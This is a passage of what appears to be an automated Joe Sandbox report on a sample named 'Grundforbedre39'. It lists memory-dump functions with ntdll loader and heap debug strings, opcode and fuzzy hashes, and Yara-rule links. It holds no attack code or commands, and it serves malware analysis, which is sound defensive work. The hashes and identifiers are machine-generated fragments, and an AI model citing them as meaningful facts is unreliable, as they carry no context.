                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-1918872054
                                                                                      • Opcode ID: 0deacd6094605405b7ea82008fdfc183f68d3e8cef83a953cd75002e0254c3aa
                                                                                      • Instruction ID: bcb4dc67373e69910ff53889f744b9befc6e42e261eb8dc90991dbb301001699
                                                                                      • Opcode Fuzzy Hash: 0deacd6094605405b7ea82008fdfc183f68d3e8cef83a953cd75002e0254c3aa
                                                                                      • Instruction Fuzzy Hash: D0916EB1608345AFE721DE20C840EABB7ECBB84798F80092EFA8592150E774E944CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • SXS: %s() passed the empty activation context, xrefs: 35581FE8
                                                                                      • .Local, xrefs: 355427F8
                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 355820C0
                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 35581FE3, 355820BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                      • API String ID: 0-1239276146
                                                                                      • Opcode ID: 8cd0cfda089c178be8705897b1f27a7cc5d7bb0ef05076c2bbee486b0d1a2609
                                                                                      • Instruction ID: dbcb36cdb0d5d04532d8161d3bd9970a167c10ed686177cd491c422718a57d6c
                                                                                      • Opcode Fuzzy Hash: 8cd0cfda089c178be8705897b1f27a7cc5d7bb0ef05076c2bbee486b0d1a2609
                                                                                      • Instruction Fuzzy Hash: 53A1ABB5A04329DBEB24CF64DC84B99B3B1BF58354F5105EAD809AB251DB70BE81CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355163CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 35570EB5
                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 35570DEC
                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 35570E2F
                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 35570E72
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                      • API String ID: 0-1468400865
                                                                                      • Opcode ID: 42b49d66c514bda344a280a034c9f45bb9edf47629859f3cf5a2493031ad7c31
                                                                                      • Instruction ID: 595767ff7511b2448acaab3c98b95340acbbddfbddc3a61c5c952d20e7982149
                                                                                      • Opcode Fuzzy Hash: 42b49d66c514bda344a280a034c9f45bb9edf47629859f3cf5a2493031ad7c31
                                                                                      • Instruction Fuzzy Hash: EA718DB59093449FEB50CF10C884F877FA9AF847A4F800869FC4A8B656D774E688CBD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                      • API String ID: 0-2586055223
                                                                                      • Opcode ID: fb2959cdbca992c52cbf13ad9a564824e307154679f084ba42d8b98c9deec43f
                                                                                      • Instruction ID: fdc37f40a198b4efc46a4fe51f4f1ff4d3faa77762cd2ef9ba9f229c764b3d52
                                                                                      • Opcode Fuzzy Hash: fb2959cdbca992c52cbf13ad9a564824e307154679f084ba42d8b98c9deec43f
                                                                                      • Instruction Fuzzy Hash: 0061F0752493809FE311CB64C844F5BB7E9FF84B64F150869E955DB291CB34F840CB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355090F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                      • API String ID: 0-1391187441
                                                                                      • Opcode ID: 938a14466f071dd0f465e3e34ca7ef6d4fc6dece076e610e804ebb210fc27383
                                                                                      • Instruction ID: 17844fc227d566f086e1dc1a2031ddaa83f27d37f01781cbeedeb1836a25a2c1
                                                                                      • Opcode Fuzzy Hash: 938a14466f071dd0f465e3e34ca7ef6d4fc6dece076e610e804ebb210fc27383
                                                                                      • Instruction Fuzzy Hash: C231AF36A00245EFDB11CB94CC84F9EB7B9EF85774F5548A1E815AB291D730F940CE60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35551190 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eT5
                                                                                      • API String ID: 0-1788069083
                                                                                      • Opcode ID: 760b537d3be61d34daff739933b3035096550dba3921f427743609871724948b
                                                                                      • Instruction ID: 4401c054cb2b107285a73d6de0ecd049a324316ea63dcd683ebdcf747d0a7095
                                                                                      • Opcode Fuzzy Hash: 760b537d3be61d34daff739933b3035096550dba3921f427743609871724948b
                                                                                      • Instruction Fuzzy Hash: CE318172A00259BBDB11CFD5CC40EDFBB7DEB84760F804826E516A7260DB70EA05CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35517072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 6d7eb59476a48579b56f147feac6aa365e0005a76e7d0227a769314597d24b5c
                                                                                      • Instruction ID: de6a2ccbf56cf138850d3d0270803dc8435500535ce78cb6cd5c7bda4838ce3f
                                                                                      • Opcode Fuzzy Hash: 6d7eb59476a48579b56f147feac6aa365e0005a76e7d0227a769314597d24b5c
                                                                                      • Instruction Fuzzy Hash: FE51EF74A14705EFFB09CB68C844BADBBB6BF44351F10416AE81297290EBB4BA51CF80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3551170C Relevance: 4.3, Strings: 3, Instructions: 520COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • HEAP[%wZ]: , xrefs: 3556F6B1
                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 3556F6D3
                                                                                      • HEAP: , xrefs: 3556F6BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      • Opcode ID: 01eb08a3d9a39c213db1a8d61490b8b2ac59f6dc7e7c583a3bdaab756475199c
                                                                                      • Instruction ID: e766236740f7ae0be2ba9c02de4ca1d0cdf81cc8ae2a05f6cda3b52247eb405a
                                                                                      • Opcode Fuzzy Hash: 01eb08a3d9a39c213db1a8d61490b8b2ac59f6dc7e7c583a3bdaab756475199c
                                                                                      • Instruction Fuzzy Hash: BF12B174B04396EFEB14CF24C480B6ABBE1BF45308F548599D896CB685DB70F981CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355A3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                      • API String ID: 0-1168191160
                                                                                      • Opcode ID: ad77c005ca9315d5629207269a18e47e810397d46e62d92c6ef78c031c0511ea
                                                                                      • Instruction ID: b147f467a47da207b3bb01f68caf5e8612eb3b374acc4f13a09b67370ed8ef6b
                                                                                      • Opcode Fuzzy Hash: ad77c005ca9315d5629207269a18e47e810397d46e62d92c6ef78c031c0511ea
                                                                                      • Instruction Fuzzy Hash: EBF192B6A042288BDB22CF14CC90BDDB3B5FF94758F5640E9D909A7240E730AE85CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                      • API String ID: 0-2779062949
                                                                                      • Opcode ID: f57020c37e9450abdf2e73321065d3aaa35882396280ceec2843986b7ac2cf5f
                                                                                      • Instruction ID: b8ea292bec1c2a3f4834a374be2b29e3b666c1777a0a30012216d62a94dd0c65
                                                                                      • Opcode Fuzzy Hash: f57020c37e9450abdf2e73321065d3aaa35882396280ceec2843986b7ac2cf5f
                                                                                      • Instruction Fuzzy Hash: B3A18D759016699BDB21DF24CC88B9EB3B8FF44714F5005EAE909A7250DB35AEC4CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • HEAP[%wZ]: , xrefs: 3556E435
                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3556E455
                                                                                      • HEAP: , xrefs: 3556E442
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                      • API String ID: 0-1340214556
                                                                                      • Opcode ID: 33168c09a65976f189ea7323749dca85acf5732a551fe50ec7f7df398a4d7e21
                                                                                      • Instruction ID: bb5a3aa2666c393eb05bdf222e8fffb1098008a9e086e2e35aa0a413c112a175
                                                                                      • Opcode Fuzzy Hash: 33168c09a65976f189ea7323749dca85acf5732a551fe50ec7f7df398a4d7e21
                                                                                      • Instruction Fuzzy Hash: 6951DA35744684AFE712CBA8C884F9ABBF8FF44748F4444A4E541DB692D774FA40CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35531514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 3557A396
                                                                                      • LdrpCompleteMapModule, xrefs: 3557A39D
                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 3557A3A7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                      • API String ID: 0-1676968949
                                                                                      • Opcode ID: df79af7fd5a487564ac1570e5d0b071ca437e59d533ecfda8a73651430f2a26a
                                                                                      • Instruction ID: 4ac050f756ff69de006fbf454df705f2a60d6ff46a8888b152f085918b805d0e
                                                                                      • Opcode Fuzzy Hash: df79af7fd5a487564ac1570e5d0b071ca437e59d533ecfda8a73651430f2a26a
                                                                                      • Instruction Fuzzy Hash: 8C510E74B097819BE712CF68C885B1AB7E5FF40750F500AA8E9569B6E1DB71F900CF80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355415EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 35581943
                                                                                      • LdrpAllocateTls, xrefs: 3558194A
                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 35581954
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                      • API String ID: 0-4274184382
                                                                                      • Opcode ID: 30d18d4471bc67e50b637ac71a579926ea30899bfe2d92b46a1cfdf2f1e33dd9
                                                                                      • Instruction ID: 1c65bbc3a48af903130d1d4157c7618ea3cde7f051914a74f5cecd30ef28e1f5
                                                                                      • Opcode Fuzzy Hash: 30d18d4471bc67e50b637ac71a579926ea30899bfe2d92b46a1cfdf2f1e33dd9
                                                                                      • Instruction Fuzzy Hash: EB4179B5A04649AFDB14CFA9D841BAEBBF1FF88300F448519E406AB350DB35B901CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3551A1E3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • @SN5, xrefs: 3551A268
                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 3551A229
                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 3551A21B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @SN5$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                      • API String ID: 0-3925210525
                                                                                      • Opcode ID: 190fc506508033b29f2a2251f6eaba831a672876174d58cb3a52f43026c61f7b
                                                                                      • Instruction ID: 2ed1368d5dbab938d3896514f59a55bbf7ed0ec47f13d0cd7dba4490bb8bb7f5
                                                                                      • Opcode Fuzzy Hash: 190fc506508033b29f2a2251f6eaba831a672876174d58cb3a52f43026c61f7b
                                                                                      • Instruction Fuzzy Hash: CB41EEB4A04744DBEB06CFA9C440B597BB4FF85750F5488A5EC24DF2A4E776EA80CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3559B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3559B2B2
                                                                                      • GlobalFlag, xrefs: 3559B30F
                                                                                      • @, xrefs: 3559B2F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                      • API String ID: 0-4192008846
                                                                                      • Opcode ID: 2b633fbb1cb8666aff9eb6e29386a54db26594b54a55d596074e8fc0346f0b86
                                                                                      • Instruction ID: d798c0b254c396e295c38b4b3b282883d7349bb88c9b6e030d65a0fdd00fe22d
                                                                                      • Opcode Fuzzy Hash: 2b633fbb1cb8666aff9eb6e29386a54db26594b54a55d596074e8fc0346f0b86
                                                                                      • Instruction Fuzzy Hash: 6D3150B1E04209AFEB14DFA4DD80AEEBBBCEF44754F800469E605E7151DB78AE04CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35541527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • LdrpInitializeTls, xrefs: 35581851
                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 3558185B
                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 3558184A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                      • API String ID: 0-931879808
                                                                                      • Opcode ID: fd0f8ebbc7f3e882e33ce213c36c18ec7c120f4b320a68f66516455fab254aca
                                                                                      • Instruction ID: 46fe498042ad03b1f50f7243cf62da1f0ab122d620da56477a3d80a5c1615c10
                                                                                      • Opcode Fuzzy Hash: fd0f8ebbc7f3e882e33ce213c36c18ec7c120f4b320a68f66516455fab254aca
                                                                                      • Instruction Fuzzy Hash: D531E4F1B24284BBE7148B56D899FEA77B9FB90394F410419E502B7180EBB0BD418FA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355985AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 355985DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                      • API String ID: 0-702105204
                                                                                      • Opcode ID: ea06d25ca002ea01f1818a62ccb1e1e82c0ce244ebf2d1378e3e26ea4da6e371
                                                                                      • Instruction ID: 646dc2f689d47d5a5930ddab69aff03aaf59392a1c4a49ee2b84f79313bd56f2
                                                                                      • Opcode Fuzzy Hash: ea06d25ca002ea01f1818a62ccb1e1e82c0ce244ebf2d1378e3e26ea4da6e371
                                                                                      • Instruction Fuzzy Hash: D3012B7631C2446BEB3D4E15D858EDA3B76FFA43A0F840458E5025B452CF247C45CE94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35517623 Relevance: 3.2, APIs: 2, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 185a17bf1ef13135397087ee3b540990b8344816947cca21c7f9daa736916983
                                                                                      • Instruction ID: e57049535e374a43867b7e2e3fb44d52cca0e8987fb44b48a8b2e10aafa701a7
                                                                                      • Opcode Fuzzy Hash: 185a17bf1ef13135397087ee3b540990b8344816947cca21c7f9daa736916983
                                                                                      • Instruction Fuzzy Hash: 10614475B14606AFEB08DF7CC480A9DFBB5BF88344F24856AD819A7340DB74BA418BD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355251C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@
                                                                                      • API String ID: 0-149943524
                                                                                      • Opcode ID: c493b25e086ee96f86ae5113d6d325a0fdc223b5824671bb72e9d3b97d2ecb87
                                                                                      • Instruction ID: 481f14697998a5801b9830bf79bd7b8f027055d437c3eb57e1341562921a2e12
                                                                                      • Opcode Fuzzy Hash: c493b25e086ee96f86ae5113d6d325a0fdc223b5824671bb72e9d3b97d2ecb87
                                                                                      • Instruction Fuzzy Hash: D4328DB46083518FD724CF14C490B2EB7E6FF88744F90892EF9869B690E774E944CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35515622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 37eea7b47d568f780fa86c12541374b95d4aaa25f5c85b45102c3722be2fd757
                                                                                      • Instruction ID: 54b2588255f49feef23096c33f8e95a0c29302f3acabad6fc18c194ed4ee0ad7
                                                                                      • Opcode Fuzzy Hash: 37eea7b47d568f780fa86c12541374b95d4aaa25f5c85b45102c3722be2fd757
